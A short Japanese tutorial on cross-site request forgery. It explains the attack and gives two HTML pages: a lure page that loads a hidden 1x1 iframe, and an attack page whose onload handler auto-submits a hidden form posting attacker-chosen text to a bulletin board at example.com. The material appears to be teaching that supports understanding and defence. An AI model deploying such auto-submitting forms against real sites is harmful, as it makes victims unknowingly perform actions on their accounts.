クロスサイトリクエストフォージェリ

クロスサイトリクエストフォージェリ（Cross site request forgeries）
　　掲示板に意図しない書き込みをさせられる
　　オンラインショップで買い物をさせられる
　　ルーターや無線LAN等の情報機器の設定を勝手に変更される

　　概要
　　　　（１）攻撃者が誘導用のページを用意する
　　　　（２）誘導用のページを閲覧する
　　　　（３）攻撃用ページにリクエストが送信され、攻撃者の意図した操作が行われる

掲示板への書き込みサンプルを挙げておきます
　　誘導用のページとして用意する
　　　　<!DOCTYPE html>
　　　　<html lang=”ja”>
　　　　<head>
　　　　　　<title>誘導用のページ</title>
　　　　</head>
　　　　<body>
　　　　　　<p>ようこそいらっしゃいました。</p>
　　　　　　<iframe width=”1″ height=”1″ src=”attack.html”></iframe>
　　　　</body>
　　　　</html>

　　攻撃用のページとして用意する
　　　　<!DOCTYPE html>
　　　　<html lang=”ja”>
　　　　<head>
　　　　　　<title>攻撃用のページ</title>
　　　　</head>
　　　　<body onload=”document.attackform.submit();”>
　　　　　　<form name=”attackform” method=”post” action=”http://example.com/bbs/register.cgi”>
　　　　　　<input type=”hidden” name=”title” value=”攻撃者が指定した題名”>
　　　　　　<input type=”hidden” name=”article” value=”攻撃者が指定した本文”>
　　　　　　<input type=”submit” value=”送信”>
　　　　　　</form>
　　　　</body>
　　　　</html>

　　仕組みの説明
　　　　・最初にアクセスされた誘導用ページのインラインフレーム内で
　　　　　　攻撃用ページが呼び出される
　　　　　　縦1 ピクセル、横１ピクセルのインラインフレーム内で行われるため、被害者は気が付かない
　　　　・攻撃用ページのonload属性により、ページが読込まれるのと同時に
　　　　　　掲示板への書き込みフォームの送信ボタンが自動的に押される
　　　　・フォームで指定された文言で掲示板に書き込みが行われる

　　　　最初に誘導用ページにアクセスした人が意図しないうちに
　　　　　　意図しない内容で掲示板に書き込みされることになる